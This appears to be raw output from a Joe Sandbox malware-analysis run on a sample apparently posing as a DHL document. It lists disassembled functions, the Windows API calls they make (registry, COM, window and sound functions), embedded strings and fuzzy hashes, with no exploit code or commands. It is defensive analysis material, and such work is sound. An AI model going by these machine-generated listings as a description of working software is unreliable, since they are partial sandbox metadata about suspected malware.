                                                                                            • Instruction ID: ee78a1b62c4cb6a1e0348f31af1a71819e8d16c8bed38a1a023fad3813093c28
                                                                                            • Opcode Fuzzy Hash: 2c6b042df18f8c07d307d9924c054a7126b595b3be7280f03945331fd9b9aa41
                                                                                            • Instruction Fuzzy Hash: 1491D571204706AFD719EF24C885FAAFBE8FF45750F008629F999C2191EB30EA45CB91
                                                                                            APIs
                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00884994
                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 008849DA
                                                                                            • _wcslen.LIBCMT ref: 008849EB
                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 008849F7
                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00884A2C
                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00884A64
                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00884A9D
                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00884AE6
                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00884B20
                                                                                            • GetWindowRect.USER32(?,?), ref: 00884B8B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                            • String ID: ThumbnailClass
                                                                                            • API String ID: 1311036022-1241985126
                                                                                            • Opcode ID: b65e37d36327e7e16f456498640e9f3ec233c07f061185b2dcc430e1d496747f
                                                                                            • Instruction ID: e46815ce231884afa7c6bc5a18cba61ade972d7dcaf87614c303f0ad92aaada7
                                                                                            • Opcode Fuzzy Hash: b65e37d36327e7e16f456498640e9f3ec233c07f061185b2dcc430e1d496747f
                                                                                            • Instruction Fuzzy Hash: 1791E27200420A9FDB04EF54C981FAA77E9FF44314F04946AFD85DA096EB34ED45CBA2
                                                                                            APIs
                                                                                              • Part of subcall function 00839BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00839BB2
                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008B8D5A
                                                                                            • GetFocus.USER32 ref: 008B8D6A
                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 008B8D75
                                                                                            • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 008B8E1D
                                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 008B8ECF
                                                                                            • GetMenuItemCount.USER32(?), ref: 008B8EEC
                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 008B8EFC
                                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 008B8F2E
                                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 008B8F70
                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008B8FA1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                            • String ID: 0
                                                                                            • API String ID: 1026556194-4108050209
                                                                                            • Opcode ID: a4b16adca5ef7764867481ac9b97329d0f4af6a89a7383e3c1e93c36592df46c
                                                                                            • Instruction ID: d087161805b1e3f8a41304aa4c4a957e28cbf44bbb335c6799d6d3e35862b75b
                                                                                            • Opcode Fuzzy Hash: a4b16adca5ef7764867481ac9b97329d0f4af6a89a7383e3c1e93c36592df46c
                                                                                            • Instruction Fuzzy Hash: 47816A71508305EFDB20CF24D885AABBBE9FB88754F140A1AF995D7391DB70D900CBA2
                                                                                            APIs
                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0088DC20
                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0088DC46
                                                                                            • _wcslen.LIBCMT ref: 0088DC50
                                                                                            • _wcsstr.LIBVCRUNTIME ref: 0088DCA0
                                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0088DCBC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                            • API String ID: 1939486746-1459072770
                                                                                            • Opcode ID: 9255e061ee0ba6239648abc7fc1c48bf3def0495bccf8f2353341948b2a8c913
                                                                                            • Instruction ID: ab599db7aae582dc4b9ba73ea3edb20154b6d063e91af39bcb63b7deb34f5e76
                                                                                            • Opcode Fuzzy Hash: 9255e061ee0ba6239648abc7fc1c48bf3def0495bccf8f2353341948b2a8c913
                                                                                            • Instruction Fuzzy Hash: A141E0329403197BDB20B66ADC47EBF776CFF52760F10006AF904E6283EA64990197A6
                                                                                            APIs
                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 008ACC64
                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 008ACC8D
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 008ACD48
                                                                                              • Part of subcall function 008ACC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 008ACCAA
                                                                                              • Part of subcall function 008ACC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 008ACCBD
                                                                                              • Part of subcall function 008ACC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 008ACCCF
                                                                                              • Part of subcall function 008ACC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 008ACD05
                                                                                              • Part of subcall function 008ACC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 008ACD28
                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 008ACCF3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                            • API String ID: 2734957052-4033151799
                                                                                            • Opcode ID: bf8d49b810837472354f64ab388034f5493d0344c58de04d7e192c1e6d1c4a11
                                                                                            • Instruction ID: 8ecb441910474e85251d9512b487c105aa74510a8d1ff2803ee300b32d83d99e
                                                                                            • Opcode Fuzzy Hash: bf8d49b810837472354f64ab388034f5493d0344c58de04d7e192c1e6d1c4a11
                                                                                            • Instruction Fuzzy Hash: F5318D71901128BBEB209B95DC88EFFBB7CFF16750F000165F916E2240DB749A46DAB0
                                                                                            APIs
                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00893D40
                                                                                            • _wcslen.LIBCMT ref: 00893D6D
                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00893D9D
                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00893DBE
                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00893DCE
                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00893E55
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00893E60
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00893E6B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                            • String ID: :$\$\??\%s
                                                                                            • API String ID: 1149970189-3457252023
                                                                                            • Opcode ID: 9e08bc0357ff0d3d8f2424ea4ad20bab93a4ca007d010035f29b771f1655669a
                                                                                            • Instruction ID: 747a05c64eaad838ce8c21ffcb58e6e4391d8edfa9efba1ec1392e56a1f07788
                                                                                            • Opcode Fuzzy Hash: 9e08bc0357ff0d3d8f2424ea4ad20bab93a4ca007d010035f29b771f1655669a
                                                                                            • Instruction Fuzzy Hash: 2031AD7290420AABDB20ABA4DC48FAF37BCFF88700F1441B5F619D6160EB7497448B24
                                                                                            APIs
                                                                                            • timeGetTime.WINMM ref: 0088E6B4
                                                                                              • Part of subcall function 0083E551: timeGetTime.WINMM(?,?,0088E6D4), ref: 0083E555
                                                                                            • Sleep.KERNEL32(0000000A), ref: 0088E6E1
                                                                                            • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0088E705
                                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0088E727
                                                                                            • SetActiveWindow.USER32 ref: 0088E746
                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0088E754
                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0088E773
                                                                                            • Sleep.KERNEL32(000000FA), ref: 0088E77E
                                                                                            • IsWindow.USER32 ref: 0088E78A
                                                                                            • EndDialog.USER32(00000000), ref: 0088E79B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                            • String ID: BUTTON
                                                                                            • API String ID: 1194449130-3405671355
                                                                                            • Opcode ID: a1428e8900b675f98284af4cfea6d56455672c80c483387f0b4f29c122f30612
                                                                                            • Instruction ID: dfff6b3824257e712ed5fd4e42a813a446f9cc423365971a3ea3d96022add3d1
                                                                                            • Opcode Fuzzy Hash: a1428e8900b675f98284af4cfea6d56455672c80c483387f0b4f29c122f30612
                                                                                            • Instruction Fuzzy Hash: CF215EB0200605AFEB10BFB4EDC9E363B69FB65B49F101525F516C22B1EBB5AC00DB25
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0088EA5D
                                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0088EA73
                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0088EA84
                                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0088EA96
                                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0088EAA7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: SendString$_wcslen
                                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                            • API String ID: 2420728520-1007645807
                                                                                            • Opcode ID: 9c1ea19f47a590c9bb2d5c33a5b536b2abf105e7148baf341dad29f509ca399a
                                                                                            • Instruction ID: 87b6400c7098e4ed4432296102782cdeddc44a6087a537869c9a3b2b06e8f4cf
                                                                                            • Opcode Fuzzy Hash: 9c1ea19f47a590c9bb2d5c33a5b536b2abf105e7148baf341dad29f509ca399a
                                                                                            • Instruction Fuzzy Hash: 9C116D61A5026979D724B7A6ED4ADFB6A7CFBA2F80F000429B811E21D1EA600A54C6B1
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00885CE2
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00885CFB
                                                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00885D59
                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00885D69
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00885D7B
                                                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00885DCF
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00885DDD
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00885DEF
                                                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00885E31
                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00885E44
                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00885E5A
                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00885E67
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                            • String ID:
                                                                                            • API String ID: 3096461208-0
                                                                                            • Opcode ID: 24e3af680dcff2a49788863b2e859553d8aac73d2511782c0976d53ba6513862
                                                                                            • Instruction ID: b6689d463180b4dd77c4ed20852612658544928e318f140f4c92780ed78d3b39
                                                                                            • Opcode Fuzzy Hash: 24e3af680dcff2a49788863b2e859553d8aac73d2511782c0976d53ba6513862
                                                                                            • Instruction Fuzzy Hash: BD510E71B00609AFDF18DF68DD89AAEBBB5FB58301F148229F915E7290D770AE04CB50
                                                                                            APIs
                                                                                              • Part of subcall function 00838F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00838BE8,?,00000000,?,?,?,?,00838BBA,00000000,?), ref: 00838FC5
                                                                                            • DestroyWindow.USER32(?), ref: 00838C81
                                                                                            • KillTimer.USER32(00000000,?,?,?,?,00838BBA,00000000,?), ref: 00838D1B
                                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00876973
                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00838BBA,00000000,?), ref: 008769A1
                                                                                            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00838BBA,00000000,?), ref: 008769B8
                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00838BBA,00000000), ref: 008769D4
                                                                                            • DeleteObject.GDI32(00000000), ref: 008769E6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                            • String ID:
                                                                                            • API String ID: 641708696-0
                                                                                            • Opcode ID: 4a9360746dcb2be0e7786dc57d433f76385dc0466a1a7c7e7c1d944bb8a01499
                                                                                            • Instruction ID: db1311eb16be37f0bbb048f20ce1dd35b6449a1a38c275966c3a57898a9e9bbd
                                                                                            • Opcode Fuzzy Hash: 4a9360746dcb2be0e7786dc57d433f76385dc0466a1a7c7e7c1d944bb8a01499
                                                                                            • Instruction Fuzzy Hash: 29618A30502B14DFCB259F29CA48B25BBF1FB90316F149528E086DBA64CB75E991CBE0
                                                                                            APIs
                                                                                              • Part of subcall function 00839944: GetWindowLongW.USER32(?,000000EB), ref: 00839952
                                                                                            • GetSysColor.USER32(0000000F), ref: 00839862
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ColorLongWindow
                                                                                            • String ID:
                                                                                            • API String ID: 259745315-0
                                                                                            • Opcode ID: f84130315686f8de48a41e6d8dd747d986cce969a1c92b8c057628c3f6fc9c18
                                                                                            • Instruction ID: d91b4e59a9ae4f94b961b525e85656a6be97455cbe685cb15a1e3e9f47441b3d
                                                                                            • Opcode Fuzzy Hash: f84130315686f8de48a41e6d8dd747d986cce969a1c92b8c057628c3f6fc9c18
                                                                                            • Instruction Fuzzy Hash: BD41AF31104644AFDB205F389C88BBA7BA5FB86330F144665F9E2D72E1C7B19841DB60
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0086F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00889717
                                                                                            • LoadStringW.USER32(00000000,?,0086F7F8,00000001), ref: 00889720
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0086F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00889742
                                                                                            • LoadStringW.USER32(00000000,?,0086F7F8,00000001), ref: 00889745
                                                                                            • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00889866
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleLoadModuleString$Message_wcslen
                                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                            • API String ID: 747408836-2268648507
                                                                                            • Opcode ID: 91b56e6fdf3a4bc0f8647ba349365c6959c848bceb3723a7579ae2cca88a2928
                                                                                            • Instruction ID: 27ca311335daf38a88fd99df93452eac092f3e956312989e24696216ea959a2d
                                                                                            • Opcode Fuzzy Hash: 91b56e6fdf3a4bc0f8647ba349365c6959c848bceb3723a7579ae2cca88a2928
                                                                                            • Instruction Fuzzy Hash: 84412E72800229AACB04FBE8ED56DEE7778FF55340F540465F605F2192EA356F88CB62
                                                                                            APIs
                                                                                              • Part of subcall function 00826B57: _wcslen.LIBCMT ref: 00826B6A
                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008807A2
                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008807BE
                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008807DA
                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00880804
                                                                                            • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0088082C
                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00880837
                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0088083C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                            • API String ID: 323675364-22481851
                                                                                            • Opcode ID: ed55fb9b801395e4ed95e2c4f9199ae02969293c3dd91f5c2e48e85b919bff65
                                                                                            • Instruction ID: c14cdd4d45098297e7707900f5f39c75a4f348dd6eda25dcefbb9b06556ebc01
                                                                                            • Opcode Fuzzy Hash: ed55fb9b801395e4ed95e2c4f9199ae02969293c3dd91f5c2e48e85b919bff65
                                                                                            • Instruction Fuzzy Hash: 4F41E972C10229ABDF15EBA4EC958EEB778FF04750F054129E911E7261EB349E48CFA1
                                                                                            APIs
                                                                                            • VariantInit.OLEAUT32(?), ref: 008A3C5C
                                                                                            • CoInitialize.OLE32(00000000), ref: 008A3C8A
                                                                                            • CoUninitialize.OLE32 ref: 008A3C94
                                                                                            • _wcslen.LIBCMT ref: 008A3D2D
                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 008A3DB1
                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 008A3ED5
                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 008A3F0E
                                                                                            • CoGetObject.OLE32(?,00000000,008BFB98,?), ref: 008A3F2D
                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 008A3F40
                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 008A3FC4
                                                                                            • VariantClear.OLEAUT32(?), ref: 008A3FD8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 429561992-0
                                                                                            • Opcode ID: 8cea0d588a957fbeda13759f18fc730b58e526b48c4050eba6a553385782d050
